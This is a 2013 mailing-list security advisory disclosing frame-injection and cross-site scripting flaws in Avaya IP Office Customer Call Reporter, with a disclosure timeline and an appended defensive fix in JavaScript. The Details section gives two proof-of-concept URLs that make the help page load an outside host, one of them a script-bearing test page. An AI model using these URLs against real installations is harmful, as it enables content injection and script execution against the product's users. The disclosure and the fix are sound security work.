Date: Wed, 21 Aug 2013 23:51:37 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in Avaya IP Office Customer Call Reporter

Hello list!

I want to warn you about vulnerabilities in Avaya IP Office Customer Call
Reporter. These are Remote HTML Include and Remote XSS Include (Cross-Site
Scripting) vulnerabilities.

After I found multiple vulnerabilities in Avaya IP Office Customer Call
Reporter in December, I informed ZDI about them (the critical ones). ZDI was
very slow in processing these holes (despite my reminders) and only on
30 July did they begin actively working on them. I wrote about this
case with ZDI on the WASC Mailing List
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-July/008883.html).

When Avaya ignored my notification in July and ZDI stopped working on this case
in August (since Avaya was not responding to them either), I published these
two vulnerabilities (the least critical ones). There are many other
vulnerabilities, including critical holes which allow taking control of the
admin panel, so Avaya still has a chance to get the details of the
vulnerabilities in their product before public disclosure.

-------------------------
Affected products:
-------------------------

Vulnerable are Avaya IP Office Customer Call Reporter 8.0.9.13 (tested in
December 2012) and 9.0.0.0 (tested recently) and previous versions.

-------------------------
Affected vendors:
-------------------------

Avaya Inc.
http://www.avaya.com

----------
Details:
----------

Remote HTML Include (Frame Injection) (WASC-12):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua

Remote XSS Include (Cross-Site Scripting) (WASC-08):

http://site/CCRWebClient/Help/en-US/index.htm?//websecurity.com.ua/webtools/xss_r2.html

------------
Timeline:
------------ 

2012.12.06 - found multiple vulnerabilities (these ones and other critical
holes).
2012.12.13 - informed ZDI about the other critical vulnerabilities.
2012.12.18 - again informed ZDI about the other critical vulnerabilities.
2013.01.27 - registered at zerodayinitiative.com and informed them through
the site. ZDI started working on the case.
2013.07.28 - informed Avaya (via two contact forms) about these holes and
the other critical vulnerabilities, due to the slowness of ZDI.
2013.07.29 - wrote about ZDI on the WASC Mailing List.
2013.07.30 - if earlier ZDI had only pretended to work on the case, this
time they started working actively on it (and tried to contact Avaya).
2013.08.07 - ZDI stopped working on the case and closed it, since Avaya was
not responding.
2013.08.20 - disclosed at my site (http://websecurity.com.ua/6717/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 
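
Added example, not from the advisory and not Avaya's code: the pattern behind both findings above is a help viewer that takes a location from its query string and frames it, so a protocol-relative value such as `//host` resolves to a foreign origin and is included (WASC-12), and a foreign page can then carry script (WASC-08). The defensive fix is to treat the query-string value as a topic name, not a URL, and allow-list it before resolving it against the help tree. The browser-side JavaScript below does that. It assumes the index page reads the topic from its query string (as the URLs above suggest); the base path `/CCRWebClient/Help/en-US/` is taken from the advisory, while the function names and the default topic are hypothetical.

```javascript
// Added example (not Avaya's code). The help viewer is assumed to take the
// topic to display from its query string and load it into a frame; only the
// base path below comes from the advisory, the rest is illustrative.
const HELP_ROOT = "/CCRWebClient/Help/en-US/";

// Returns the same-origin URL that may be framed, or null if the requested
// topic must be rejected. `origin` is the page's own origin (location.origin).
function resolveHelpTopic(rawTopic, origin) {
  if (typeof rawTopic !== "string" || rawTopic.length === 0) return null;

  let topic;
  try {
    topic = decodeURIComponent(rawTopic); // normalise %2F etc. before checking
  } catch (e) {
    return null; // malformed percent-encoding
  }

  // Reject anything a browser could interpret as a URL rather than a path:
  // a scheme ("http:", "javascript:", ...), an absolute path, a
  // protocol-relative "//host", or backslash variants some parsers accept.
  if (/^[a-z][a-z0-9+.-]*:/i.test(topic)) return null;
  if (topic.startsWith("/") || topic.startsWith("\\")) return null;
  if (topic.includes("//") || topic.includes("\\")) return null;

  // Allow-list: simple relative path segments, ending in .htm or .html.
  // Dots are only permitted in the extension, which also rules out "..".
  if (!/^(?:[A-Za-z0-9_-]+\/)*[A-Za-z0-9_-]+\.html?$/.test(topic)) return null;

  // Resolve against the help root and confirm the result is still on our
  // origin and inside the help tree (defence in depth after the regex).
  const resolved = new URL(HELP_ROOT + topic, origin);
  if (resolved.origin !== new URL(origin).origin) return null;
  if (!resolved.pathname.startsWith(HELP_ROOT)) return null;
  return resolved.href;
}

// Mirrors the viewer's behaviour: take the raw query string (with or without
// the leading "?") and return the frame src, falling back to a default topic
// instead of ever framing the untrusted value. "default.htm" is hypothetical.
function frameSrcFromQuery(search, origin) {
  const raw = search.startsWith("?") ? search.slice(1) : search;
  return resolveHelpTopic(raw, origin) ||
    new URL(HELP_ROOT + "default.htm", origin).href;
}

// Typical use in the page (assumed wiring):
//   document.getElementById("topic").src =
//     frameSrcFromQuery(location.search, location.origin);
```

The key design choice is that the value is never handed to the URL parser first and inspected afterwards; it is matched against a narrow grammar for topic names and only then joined to a fixed base. A server-side `Content-Security-Policy` with `frame-src 'self'` (or `X-Frame-Options` on the framed pages) is a complementary control, but it does not replace validating the parameter.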

